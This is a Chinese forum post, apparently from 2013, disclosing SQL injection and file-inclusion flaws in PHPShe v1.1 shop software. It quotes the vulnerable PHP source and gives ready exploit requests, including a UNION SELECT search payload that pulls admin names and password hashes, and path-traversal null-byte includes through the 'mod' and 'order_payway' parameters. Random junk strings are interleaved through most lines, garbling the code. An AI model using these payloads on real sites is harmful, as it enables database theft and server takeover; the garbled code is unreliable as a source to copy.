找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
! V+ X; f9 K' E: d% t4 H' W1 G  ?/* Phpshe v1.1 Vulnerability: K5 `9 p) h9 D7 o$ w8 n$ E
/* ========================0 A0 l+ |1 x( J+ [# b5 K) `  i# Q0 U
/* By: : Kn1f3
# E8 e% p% L' s6 `2 X/* E-Mail : 681796@qq.com1 N+ b7 k* c" s$ w) B' P
/*******************************************************/
4 {3 ~! y6 G- a8 N0 i) s2 y4 i0×00 整体大概参数传输; `, B; B8 l' o2 y2 i

5 l' r% d- Z  l4 M1 x5 w  m* n
' q8 ]/ H, f9 E/ C/ [. t3 z# h

7 e. u& a4 q; c& D9 T( @( c//common.php
8 u) ^% a1 `2 \( |& _if (get_magic_quotes_gpc()) {
& Z8 R4 j; N  G+ O: `0 L- M8 H!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');3 y1 C& n# g% K2 H
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
3 E: B) U0 g: Q}
. F; ~0 J0 [" j5 ^) h# t9 Jelse {  u- n* c$ Y7 _" c
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');' n3 m+ N+ C/ H7 R" M( e, P
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');( Y8 w+ x. n2 m! K  T/ {
}
, Y2 S, ?9 y0 }) Ssession_start();* i3 [8 l% i% j5 M, n
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
6 E* j3 Q& {& G  w* m' Q!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
5 D' d! Z+ r; R7 c/ ^5 P. `" K9 h
0×01 包含漏洞" {& R0 s5 N3 n9 j! y3 G

/ |6 T6 w* i4 l& ~$ w. W7 w
- y' _7 l; f8 r9 p) Y+ m7 ]' B
//首页文件/ U$ h. c" l$ l( Y3 N
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);0 q% g0 y' p; K) F7 o1 E
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞! {$ x$ `+ D# A' C' P0 M
pe_result();
  V, w6 O2 \$ _. s% A( l+ _3 @?>
& k! R8 ~  T; T" ^8 w, h$ ?' c//common 文件 第15行开始
8 `+ z! }* t- {, l8 O; t5 i& rurl路由配置
5 {( }2 s5 a) {: O% v; X0 U$module = $mod = $act = 'index';
# R, ?/ I/ q/ o. o$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);) x8 f1 x( u0 S2 D
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);  T( Z) n  ^2 P4 P
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);+ f# @  ~% c& ^7 A  d# W9 R  |5 r
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
' h& x8 k$ j" `4 E/ B0 i


# e8 @$ ], N: d) q 2 Y: E3 ~1 @1 T/ n( ]
0×02 搜索注入; _2 K0 m5 B5 _0 Q7 w7 Y: ^

  R# p# Z! j2 Y" p2 o" r4 J<code id="code2">

//product.php文件4 Z$ L7 R; l2 g& d/ x+ X9 `; Z" i
case 'list':4 x$ G: {! X, l7 f$ s+ Y: C' C* l' D
$category_id = intval($id);" i9 H$ B6 i( i' N$ A7 F
$info = $db->pe_select('category', array('category_id'=>$category_id));: L( B" z; y9 i
//搜索2 \9 D' U  x2 B" L7 g
$sqlwhere = " and `product_state` = 1";
! P: b, p0 O- D8 P; Gpe_lead('hook/category.hook.php');3 ?& R" w6 S  a, {$ G3 {
if ($category_id) {
" }. E  a0 N! G' uwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
; X$ t* {$ i9 P, t4 V' S0 T}7 \/ y: H& @- k1 N
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
, g3 o$ `% _' Q; p) S: vif ($_g_orderby) {
4 P: T4 Y) P4 e6 d6 B$orderby = explode('_', $_g_orderby);
& q0 d7 @1 t7 x2 [$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";, X! q3 f- I! Z: [
}
( w* F- A0 f- T  \else {3 `7 e% [# m7 q: R: S( ]
$sqlwhere .= " order by `product_id` desc";4 G. ^5 h( t5 h" }
}
; F/ q. D3 d% L5 B$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));$ e; K7 F; ^0 a# A) [# n
//热卖排行4 I  X& m1 L0 [3 s- ]' `  p% }
$product_hotlist = product_hotlist();9 a, i1 d5 `2 f8 C, X# |
//当前路径. M- U- _9 P. a) d7 ?
$nowpath = category_path($category_id);
2 Z) n! f1 |* e: O9 M6 |( Y$seo = pe_seo($info['category_name']);' Q5 P3 A* I1 s- {8 k
include(pe_tpl('product_list.html'));
' W& x3 C9 S& G& m* y* u  {5 [//跟进selectall函数库
: c" v) Y6 A- D3 f9 upublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
3 p9 Z2 q  [* \3 U) k, W2 {7 q{' C* T$ e( g6 y: R/ K
//处理条件语句
# G8 Q" ~9 T) Q; Z0 Q/ S* b$sqlwhere = $this->_dowhere($where);
  G8 |# [" W2 r, kreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);( P- E% Y# y5 R2 m7 [& A0 E% |
}
" k, ]* j! f, Q# z5 C" |8 {//exp3 t- q; K. F* l& n2 o
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
$ o) k% e  z. ^% W9 B& `

</code>
- a1 u5 w; B6 w6 C  ~) U
9 Z8 J7 s( w' D) E% a% Q( Z0×03 包含漏洞2
) I! A8 \: K7 B6 K5 ~/ C * P# J& c) p/ S5 ?2 Z( H
<code id="code3">

//order.php

case 'pay':


9 T  v1 L! f- [: `3 M$order_id = pe_dbhold($_g_id);

& j" V4 V+ b  S5 v
$cache_payway = cache::get('payway');

4 z3 w. m7 r  Q, l$ H6 n4 _
foreach($cache_payway as $k => $v) {

5 I* R7 [; @  t/ R6 H
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


8 b8 Z- w- t# W/ Zif ($k == 'bank') {

+ R& _$ k! R# A7 T9 C0 z
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

4 f- `* E9 a, i' X
}


1 ^8 ~! m1 X9 K3 W$ c2 j- U% w}


) y( f; z" H" g$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

/ _+ r2 `6 w& f! r; U  H% x
!$order['order_id'] && pe_error('订单号错误...');

, k8 o  f8 M6 U3 t; m
if (isset($_p_pesubmit)) {

1 a; |2 x+ d% U! b1 b/ X
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

& u. t7 @0 s' C4 n
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

/ V+ c$ r8 S' V% O0 v
foreach ($info_list as $v) {


2 o5 Q3 t0 {) r) W! T; y1 n$order['order_name'] .= "{$v['product_name']};";
+ P( w6 N* B5 k- h) M/ F" U6 C


. V0 }* X' w% U5 V5 ?' w}

/ m- q0 Z  r3 u4 \
echo '正在为您连接支付网站,请稍后...';

2 I9 B9 v( r8 H; A
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


$ |# F* n& F1 q' b& s8 l  D$ v}//当一切准备好的时候就可以进行"鸡肋包含了"

7 z5 G6 S  m+ Z: U& ^) f
else {

8 T- D7 V( z) n6 z# N4 I  D
pe_error('支付错误...');


6 ~! b* k- l1 k* K1 g! f+ y! X, t( \}

' A1 h6 }! k4 M1 d
}

! O/ l) ~+ W' W7 s$ ~8 }
$seo = pe_seo('选择支付方式');

: L5 r' H1 Q8 d& r
include(pe_tpl('order_pay.html'));

3 x# U8 |7 u- {
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
4 @& z2 p5 ?& g0 I/ Hhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表